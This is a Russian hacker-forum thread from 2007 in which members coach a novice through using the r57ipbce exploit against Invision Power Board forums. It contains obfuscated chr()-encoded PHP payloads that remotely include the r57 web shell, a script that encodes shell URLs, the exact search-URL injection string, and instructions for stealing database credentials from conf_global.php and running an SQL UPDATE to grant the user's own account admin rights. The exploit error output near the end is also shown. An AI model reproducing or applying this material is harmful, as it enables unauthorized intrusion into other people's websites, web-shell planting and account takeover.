Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Где взять include для эксплоита r57ipbce? (https://forum.antichat.xyz/showthread.php?t=31785)

3a6bI/\ 21.01.2007 11:06

Где взять include для эксплоита r57ipbce?
 
Помогите плиз.
Цитата:

'r57ipbxplhohohoeval(include(chr(104).chr(116).chr (116).chr(112).chr(58).chr(47).chr(47).chr(114).ch r(115).chr(116).chr(46).chr(118).chr(111).chr(105) .chr(100).chr(46).chr(114).chr(117).chr(47).chr(11 4).chr(53)'
'.chr(55).chr(105).chr(112).chr(98).chr(105).chr(1 10).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
Эти строки я расшифровал (спасибо кто помог ;) )
Теперь вопрос где взять инклюд для этого эксплоита.
И еще такой вопрос:
Если я смогу выполнять команды то какими можно залесть в админку или что то типа того.

ЗЫ: Могу выложить таблицу ASCII-кодов для нубов )

aka PSIH 21.01.2007 11:10

скажи какую ссылку надо тебе туда закать...

3a6bI/\ 21.01.2007 11:15

Цитата:

Сообщение от aka PSIH
скажи какую ссылку надо тебе туда закать...

Не, ты не понял. Я уже все расшифровал и зашифровать тоже могу, но мне нужен сам include, ссылка на который зашифрована. Ведь rst.void.ru закрылся и ссылка битая. А я хочу выложить этот инклюд на свои хостинг и закодировать ссылку вместо этой.

ЗЫ: У тебя случаем нету программы которая бы кодировала буквы в ASCII код? (то есть в chr(...)) А то смотреть по таблице как то не хочется :)

aka PSIH 21.01.2007 11:20

Код:

url = "http://rst.void.ru/download/r57shell.txt"
For i = 1 To Len(url)
  result = result & "chr(" & Asc(Mid(url, i, 1)) & ")."
Next i
result = "r57ipbxplhîhîhîeval(include(" & Mid(result, 1, Len(result) - 1) & "));"
MsgBox result
Clipboard.SetText result

(с)Bug(o)r

3a6bI/\ 21.01.2007 11:22

Цитата:

Сообщение от aka PSIH
Код:

url = "http://rst.void.ru/download/r57shell.txt"
For i = 1 To Len(url)
  result = result & "chr(" & Asc(Mid(url, i, 1)) & ")."
Next i
result = "r57ipbxplhîhîhîeval(include(" & Mid(result, 1, Len(result) - 1) & "));"
MsgBox result
Clipboard.SetText result

(с)Bug(o)r

И что это?

aka PSIH 21.01.2007 11:24

Цитата:

И что это?
Это называеться исходный код программы которая бы кодировала буквы в ASCII код? (то есть в chr(...)) ... :)

Ладно забирай готовую тут:
http://rapidshare.com/files/12648382/Project1.exe.html

3a6bI/\ 21.01.2007 11:26

Цитата:

Сообщение от aka PSIH
Это называеться исходный код программы которая бы кодировала буквы в ASCII код? (то есть в chr(...)) ... :)

Ладно забирай готовую тут:
http://rapidshare.com/files/12648382/Project1.exe.html

Ааа.... )) Спасибо! А include 'a у тебя нет?
А на чем прогу писал?
И еще : а есть программа которая наоборот бы код делала бы в ссылку?Или в этой тоже можно?

aka PSIH 21.01.2007 11:29

Просто ложишь на свой сайт шелл r57 (www.site.ru/r57.txt)
Потом с помощью проги перегоняешь все в ASCII код
Код:

r57ipbxplhohohoeval(include(chr(119).chr(119).chr(119).chr(46).chr(115)
.chr(105).chr(116).chr(101).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)
.chr(55).chr(46).chr(116).chr(120).chr(116))); //

И все, какой инклуд тебе нужен?

3a6bI/\ 21.01.2007 11:37

Include это txt на который ссылается этот эксплоит! Он находится на rst.void.ru (но сайт закрылся) => неьзя выполнить команды .
Внимание вопрос: нужен именно инклюд чтобы выполнять команды или шелл?

aka PSIH 21.01.2007 11:40

Оригинал этого эксплойта ссылался на http://rst.void.ru/download/r57shell.txt

n1†R0x 21.01.2007 11:40

шелл и есть инклуд в данном случае... о_0

google.ru keywords: r57shell

3a6bI/\ 21.01.2007 11:46

Цитата:

Сообщение от n1†R0x
шелл и есть инклуд в данном случае... о_0

google.ru keywords: r57shell

Cпс. http://sources.codenet.ru/file/829/r57shell.php это то или нет?

И теперь я должен залить его к себе на сервер (сайт) и вставить ссылку в экплоит?

aka PSIH 21.01.2007 11:47

я же тебе писал:
Цитата:

Просто ложишь на свой сайт шелл r57 (www.site.ru/r57.txt)
Потом с помощью проги перегоняешь все в ASCII код

zl0ba 21.01.2007 11:48

Теперь ты должен заменить ссылку на свою...

3a6bI/\ 21.01.2007 11:48

Спасибо всем! Побежал пробовать

n1†R0x 21.01.2007 11:49

Цитата:

Cпс. http://sources.codenet.ru/file/829/r57shell.php это то или нет?
оно самое ;)
Цитата:

И теперь я должен залить его к себе на сервер (сайт) и вставить ссылку в экплоит?
угумс. сцылку в ascii/dec не забудь перевести)

3a6bI/\ 21.01.2007 12:09

Вставил ссылку. Теперь эксплоит не может найти сообщение
Create new message .... [done]
Serch message ... [failed]

ЗЫ: Со старой ссылкой все Ок тока команды не отправляются )

aka PSIH 21.01.2007 12:13

Делай так:
Цитата:

сначала создаём тему в заголовке и описании пишем левую бойду а в самой теме експлойт:
r57ipbxplhohohoeval(*******))); //

потом ищешь в поиске по форуму слово r57ipbxplhohohoeval и после этого
в адресной строке стираем всё после параметра searchid и вставляем &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00

3a6bI/\ 21.01.2007 12:19

Цитата:

Сообщение от aka PSIH
Делай так:

А что должно получится то? Мне пишет: Обнаружена ошибка. Если Вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.

aka PSIH 21.01.2007 12:20

Цитата:

А что должно получится то?
шелл заинклудится

3a6bI/\ 21.01.2007 12:21

Цитата:

Сообщение от aka PSIH
шелл заинклудится

И как проверить заинклюдился шелл или нет?

aka PSIH 21.01.2007 12:22

как как, ты его увидешь...

3a6bI/\ 21.01.2007 12:25

Цитата:

Сообщение от aka PSIH
как как, ты его увидешь...

Можешь пожалуйста объяснить подробнее. Вот я в строке поиска ввел что надо, нажал интер и что дальше делать? плиз ты же умный ) помоги

aka PSIH 21.01.2007 12:29

Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
И у тебя в браузере открываеться r57 шелл(если форум бажный)

3a6bI/\ 21.01.2007 12:32

Цитата:

Сообщение от aka PSIH
Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
И у тебя в браузере открываеться r57 шелл(если форум бажный)


hohoho
Точно hohoho? просто с твоей прогой получается hihihi

aka PSIH 21.01.2007 12:33

точно, замени на hohoho

3a6bI/\ 21.01.2007 12:40

Цитата:

Сообщение от aka PSIH
точно, замени на hohoho

Теперь ни че не происходит. То есть я заменяю все после search_in, жму интер, окно обновляется и опять открывается поиск.

Может шелл не так залил, может хостинг фигня...
Можешь мне дать адрес твоего шелла, если он есть у тебя?

Constantine 21.01.2007 13:42

О. сколько раз на форуме перетирался этот вопрос!

1) Рабочий шелл


eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен

3a6bI/\ 22.01.2007 20:54

Цитата:

Сообщение от Constantine
О. сколько раз на форуме перетирался этот вопрос!

1) Рабочий шелл


eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен

Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом

}{0TT@БЬ)Ч 23.01.2007 00:14

Цитата:

Сообщение от 3a6bI/\
Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом

Я поражаюсь зачем тебе админка, если есть шелл,хотя чему тут удивляться сам таким был :rolleyes: но я все таки попробую тебе объяснить один из способов как попасть в нее, если разумеется у тебя есть шелл.Для начала зарегистрируй юзера и запомни его id, далее надо выдернуть записи из файла forum/conf_global.php
$INFO['sql_database']='............;
$INFO['sql_driver']= '.............';
$INFO['sql_host']='.........';
$INFO['sql_pass']= '............';
$INFO['sql_user']='..............';
Потом в самом низу шелла есть: Выполнение SQL запроса туда вставляешь те данные которые ты вытянул из conf_global.php в сам запрос ставишь
UPDATE ibf_members SET mgroup=4 WHERE id=ид твоего юзера, и все ты админ, можешь топать в админку.

-=void=- 13.03.2007 17:14

Цитата:

Сообщение от Constantine
О. сколько раз на форуме перетирался этот вопрос!

1) Рабочий шелл


eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен

даже когда отделяешь ; // сплойт неработает почемута ссылка идет с точкой и выдает ошибку можете дать рабочий код ?

-=void=- 13.03.2007 17:41

Цитата:

Сообщение от -=void=-
даже когда отделяешь ; // сплойт неработает почемута ссылка идет с точкой и выдает ошибку можете дать рабочий код ?

IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] (null)(): Failed opening 'http://.rcw-team.ru/download/shell/r57shell.txt' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)

вот что я получаю


Время: 00:14